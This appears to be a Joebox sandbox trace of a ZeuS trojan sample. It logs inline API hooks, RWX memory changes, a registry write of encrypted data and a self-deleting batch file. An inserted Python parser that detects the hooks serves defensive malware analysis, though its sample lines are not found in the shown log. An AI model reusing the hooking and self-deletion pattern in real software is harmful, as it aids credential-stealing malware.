Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE BB 3C success or wait 2002752432
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 2A C3 success or wait 2002753347
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 2002754584
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002755232
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 C1 3C success or wait 2002755427
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 24 C3 success or wait 2002756813
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 2002758122
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002758719
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 C1 3C success or wait 2002759079
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 24 C3 success or wait 2002759986
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 2002762174
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002762827
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 BA 3C success or wait 2002763186
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D949088 Length: 5 Value: E9 AD B1 2B C3 success or wait 2002764095
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 2002766350
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002767001
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 BA 3C success or wait 2002767360
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94654B Length: 5 Value: E9 2D DD 2B C3 success or wait 2002768275
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 2002770289
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002770943
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 BC 3C success or wait 2002771302
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D963381 Length: 5 Value: E9 36 0F 2A C3 success or wait 2002772211
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2002774416
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002775066
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF BA 3C success or wait 2002775424
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 2B C3 success or wait 2002776334
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 2002778646
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002779214
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 BA 3C success or wait 2002779572
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 2B C3 success or wait 2002780483
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2002781514
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002782554
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D D1 70 success or wait 2002782914
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB3E2B Length: 5 Value: E9 83 8A 14 8F success or wait 2002783831
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2002784848
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002785505
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0082 Length: 10 Value: 8B FF 55 8B EC E9 A0 4B D1 70 success or wait 2002785866
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB4C27 Length: 5 Value: E9 BF 7C 14 8F success or wait 2002786783
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2002787787
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002788387
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA008C Length: 10 Value: 8B FF 55 8B EC E9 69 68 D1 70 success or wait 2002788746
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 71AB68FA Length: 5 Value: E9 0D 60 14 8F success or wait 2002789659
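The "Memory read" / "Memory written" triplets in this stretch of the log are the signature of a 5-byte inline hook: the sample reads 30 bytes of a target function's prologue, writes a 10-byte stub (the 5 stolen prologue bytes followed by an E9 JMP back to target+5) into the RWX region it allocated at DA0000, then overwrites the first 5 bytes of the target with an E9 JMP into its own handler. The following script is an added example, not part of the Joebox report or of the sample's code: it parses these event lines, pairs each hook write with its trampoline, and computes the handler address from the rel32 displacement (32-bit wraparound included, since the displacements here are negative). The sample lines are excerpted from the log above and trimmed to the fields the parser needs; the parser ignores the Length field and uses the byte count of Value instead.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple

# Matches the "Memory read" / "Memory written" events in the Joebox log format
# (full lines with a Path: field also match; the lazy .*? skips it).
EVENT_RE = re.compile(
    r"Memory (?P<op>read|written) PID: (?P<pid>\d+) .*?"
    r"Base: (?P<base>[0-9A-Fa-f]+) Length: \w+ "
    r"Value: (?P<value>(?:[0-9A-Fa-f]{2} ?)+)"
)

MASK32 = 0xFFFFFFFF


def rel32_target(instr_addr: int, rel: bytes) -> int:
    """Destination of a 5-byte E9 rel32 JMP located at instr_addr (32-bit wraparound)."""
    return (instr_addr + 5 + int.from_bytes(rel, "little", signed=True)) & MASK32


@dataclass
class Hook:
    target: int                 # function whose first 5 bytes were overwritten
    stolen: bytes               # original prologue bytes, from the preceding read
    handler: int                # where the JMP written at target lands
    trampoline: Optional[int]   # stub = stolen bytes + JMP back to target+5, if found


def parse_events(lines) -> Iterator[Tuple[str, int, bytes]]:
    for line in lines:
        m = EVENT_RE.search(line)
        if m:
            yield m["op"], int(m["base"], 16), bytes.fromhex(m["value"].replace(" ", ""))


def find_inline_hooks(lines) -> List[Hook]:
    reads: Dict[int, bytes] = {}   # last bytes read at each address
    stubs: Dict[int, bytes] = {}   # writes that are not 5-byte JMPs: trampoline candidates
    hooks: List[Hook] = []
    for op, base, data in parse_events(lines):
        if op == "read":
            reads[base] = data
            continue
        if not (len(data) == 5 and data[0] == 0xE9):
            stubs[base] = data
            continue
        stolen = reads.get(base, b"")[:5]
        # Identical prologues (8B FF 55 8B EC) recur across targets, so a trampoline is
        # matched by its JMP-back destination (target + 5), not by the stolen bytes alone.
        trampoline = next(
            (addr for addr, blob in stubs.items()
             if len(blob) == 10 and blob[:5] == stolen and blob[5] == 0xE9
             and rel32_target(addr + 5, blob[6:10]) == ((base + 5) & MASK32)),
            None,
        )
        hooks.append(Hook(base, stolen, rel32_target(base, data[1:5]), trampoline))
    return hooks


# Excerpted from the log above, trimmed to the fields the parser needs.
SAMPLE_LOG = """\
Memory read PID: 1960 Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10
Memory written PID: 1960 Base: DA0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 B6 7B
Memory written PID: 1960 Base: 7C90D1AE Length: 5 Value: E9 33 B7 2E 84
Memory read PID: 1960 Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01
Memory written PID: 1960 Base: DA0014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 A7 7B
Memory written PID: 1960 Base: 7C811195 Length: 5 Value: E9 CE 79 3E 84
Memory read PID: 1960 Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03
Memory written PID: 1960 Base: DA001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA BA 3C
Memory written PID: 1960 Base: 3D94FABE Length: 5 Value: E9 97 45 2B C3
"""

if __name__ == "__main__":
    for h in find_inline_hooks(SAMPLE_LOG.splitlines()):
        tramp = f"{h.trampoline:08X}" if h.trampoline is not None else "none"
        print(f"{h.target:08X}: stolen {h.stolen.hex().upper()} -> handler {h.handler:08X}, "
              f"trampoline {tramp}")
```

Run against the three excerpted hooks, the computed handlers are 0x00BF88E6, 0x00BF8B68 and 0x00C0405A, and each trampoline's JMP lands exactly at target+5, which confirms the stubs at DA0000, DA0014 and DA001E are the detour return paths. All three handlers fall inside 0x00BE0000 to 0x00C0A000, the range of the 172032-byte hianh.exe section the log shows mapped at BE0000; the log does not state whether that mapping and these writes belong to the same process, so treat the overlap as a lead to confirm against a memory dump rather than as a conclusion. In a live triage the same computation gives you the addresses to dump and the 5-byte original prologues needed to unhook.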
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2002791252
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002791904
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2002794728
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002795375
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2002798203
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002798852
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2002801586
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002802236
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2002805020
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002805672
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2002808262
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002808933
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2002814752
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002815418
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2002817870
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002818465
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2002821150
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002821744
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2002824136
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002824734
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2002827398
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002828050
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 2002830750
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002831344
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002834061
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002834652
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002837444
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002838093
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002841480
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002844799
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002848104
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002851439
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002854760
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002858076
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002861448
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002864552
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002870922
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002874340
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002877702
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002880959
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002884041
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002887348
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002890569
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002893867
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002897182
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002900419
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002903716
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002906936
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002910228
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2002918842
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Okmaykid success or wait 2002919377
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Okmaykid success or wait 2002919983
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2002921920
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002988635
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2002994639
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 206 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 2002999821
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and write and read and execute and extend size Type: image Baseaddress: BE0000 Size: 172032 Protection: readonly Mapped to pid: own pid success or wait 2003005825
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: DB0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2003007863
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2003028568
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: C20000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2003030746
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C20000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2003031796
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: C20000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2003033541
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C20000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2003034443
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C20000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2003041594
Process created PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Createflags: 0 success or wait 2003044715
System info queried Type: ProcessInformation success or wait 2003051859
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2003054566
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2E59-CCC3D8887706} success or wait 2003106564
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 12E674 Allocation Type: null Protection: page execute and read and write success or wait 2003106720
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 140000 Length: 27000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2003107592
